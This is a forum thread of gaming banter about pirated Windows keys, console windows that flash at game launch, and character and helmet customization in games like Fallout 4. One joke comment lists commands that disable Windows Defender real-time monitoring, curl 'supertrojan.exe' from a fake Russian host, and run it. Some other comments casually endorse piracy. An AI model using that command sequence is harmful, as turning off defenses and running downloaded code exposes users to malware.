  • Everythingispenguins,

I fucking did it was tenish year ago. Ran it in a vbox for the fun of it. Oddly it was the best windows experience I ever had. Can’t say how much malware was in it though.

And yes I forgot an s so fucking sue me champ

    Anticorp,

I used pirated versions of XP for a decade. Nothing bad ever came of it. There were a lot of crackers back then that just did it for the challenge, and shared it because they wanted to.

    a_wild_mimic_appears,

My win10 licences are all from pirated Win7 that was grandfathered in when upgrading lol

    Anticorp,

Same here actually. Now it’s totally free spyware/adware, so those days are gone. I just use Linux now.

    ItsAFake,

My first copy of Winxp was stolen from windows a week before release, I found out when I saw a picture of someone holding a burnt disc with windows xp on it outside of Microsoft and it had my serial key on it.

    Edit: here’s the picture.

    GroteStreet,

I don’t even have to open the image to know it’s FCKGW!

    ItsAFake,

13 year old me loved that my windows key had fuck in it. I used to know that entire key off by heart.

    Anticorp,

That’s awesome. I eventually got my hands on an enterprise CD key that was given out to over 1000 students at a university and used that instead of the keygens for tortented ISOs.

    Ah yes, Windows…

Not only for viruses, I saw legitimate software creating those console windows to run.

    trashgirlfriend,

I’m pretty sure some drivers do that

    Agent641,

My work PC does it on boot. Opens and then closes like 8 command windows.

    trashgirlfriend,

Well that probably is malware but installed by your company

    smileyhead,

Just look into journal and logs what processes were started by a terminal window…

    Oh… Right.

    1371113,

Startup scripts most likely. A sign of a bunch of legacy tech in your environment.

    masterspace,

Good spyware doesnt show those either, they’re not a sign of malware but of sloppy coding.

    magikmw,

Not always. Having spent significant time of the entire projects to hide console and powershell windows, I think Windows is just crap.

    MonkderZweite, (edited )

Yes, there was a good cli-tool for this, until it didn’t work anymore.

    smileyhead,

    A tool for this…
Running a program by another program without interrupting user should be a basic feature of an OS!

    MonkderZweite,

    You would probably love Oberon.

AceFuzzLord, do gaming w Ignorance is bliss

Even if I am pretty sure I’m not getting a virus, I’m always nervous when that happens regardless of the program on my desktop.

finkrat, do gaming w Ignorance is bliss

It’s just setting up a keylogger so it can help you when you suck at your new pirated game :)

    Wait… What’s the truth…

    casmael,

    Probably mining for bitcoin

    Feathercrown,

Free game providers can have a little bitcoin, as a treat

    otp,

    uqm-mods.sourceforge.net/Download

Here’s one. I’d like the aforementioned treat, please!

    Feathercrown,

You may use my GPU anytime 😊

    Son_of_dad,

    This answers nothing

    CosmicTurtle,

    Set-MpPreference -DisableRealtimeMonitoring $true

Disables malware scanning in windows (I assume)

    curl malwarefo.ru/supertrojan.exe

Downloads supertrojan.exe from a Russian website

    ./supertrojan.exe

    Executes the file

    ./game.exe

    Runs the game

    exit

    Closes the command prompt.

    0

Opens the portal to the underworld, to ensure that the command prompt closes correctly.

    odium, (edited )

Not saying you should understand it, but it does answer it if you understand it

    ColeSloth,

    But I don’t want a super Trojan : -(

    Yes

    Redfugee,

Do you really want to know the truth or do you want to play your new game \o/

    A_Very_Big_Fan,

I always thought it was running anti-“anti-piracy” measures before launching the game. I suppose it could be malware too, which seems like what the meme is getting at.

    Cornelius_Wangenheim,

Real answer is just that they’re executing a process without setting the window style to hidden. It doesn’t mean anything other than the dev is lazy / inexperienced.

Been playing Helldivers 2, really fun game!
Question about it: It offers a curved HUD option in the settings, which is really neat in the YT vids I’ve seen, especially since I have a curved monitor. I’d love to enable this, but it doesn’t work at all for me. Does it for anyone else?

MagnyusG, do gaming w I try to convince myself to use "random appearance" in games that have it now

That’s why good games give you the option to remove helmets during cutscenes, or just hide them altogether.

    Kusimulkku,

No. I want to see my cool helmet. Games that remove helmets and (all customization) during cutscenes annoy me.

    squirrels,

    option

    Good work reading their comment

    Kusimulkku,

    or just hide them altogether.

I read that as in they either remove the helmets during cutscenes or they give you an option for selecting if you want to do that. But sure, thanks for the compliment…

    Swedneck,
    @Swedneck@discuss.tchncs.de avatar

ideally i’d want games to have NPCs react to if you’re wearing a helmet or not, and a real risk of getting attacked when in populated areas, so you have a choice to make whether you want to keep your helmet on or take it off (and that should be a simple button press)

that way there’s a bit of added flavour, and you have an actual reason to see your character without a helmet.

    MonkderZweite,

Seems like a logical fallacy to me.

AgentGrimstone, do gaming w I try to convince myself to use "random appearance" in games that have it now

I usually rock the body armor + no helmet look, it’s badass, unless the helmet has stats that are too good to pass up.

I liked when in WoW you could turn off helmets in settings.

    tominator,

    But the helmet stays on.

I spend most of my time constantly customizing my character in Fallout 4 than actually playing the game I’ve noticed. I like to switch out her outfits, her hair, eye colour, etc. from time to time depending in what’s happening in game. For example, if she’s in Nuka World as a raider then I put on a post-apocalyptic outfit or if she’s in the institute I dress her as a covert assassin.

Haha, hours spent making my Skyrim characters just the right shade of almost looking right…

I play exclusively in first person.

Just got fallout 4 the other day. Spent like an hour making the guy look like Geralt from the Witcher, then proceeded to play as the gal.

Such a shame that >!he died after like 10 minutes!<

    Demdaru,

Ooooh, you still might hear his echo :3

    YarHarSuperstar,
    @YarHarSuperstar@lemmy.world avatar

I’m learning just now that you can even customize both of them. I never thought to do both, just whichever I feel like playing as for that playthrough.

    Agrivar,

Wait, am I just learning now that you can customize both parents and then choose which one to actually play later?

    Patches,

You customize both but “later” is a stretch. You will never see the other after bout 10 minutes of gameplay. >!Spoilers!<. I think they use both of your looks to generate your child but honestly that side story is such shit - I’d rather not look for my son/daughter.

    FilthyShrooms,
    @FilthyShrooms@lemmy.world avatar

Nonsense. If you ever want to >!go back to the vault, you can see their frozen body slumped over next to your open cryopod.!< That’s like a whole 12 minutes!
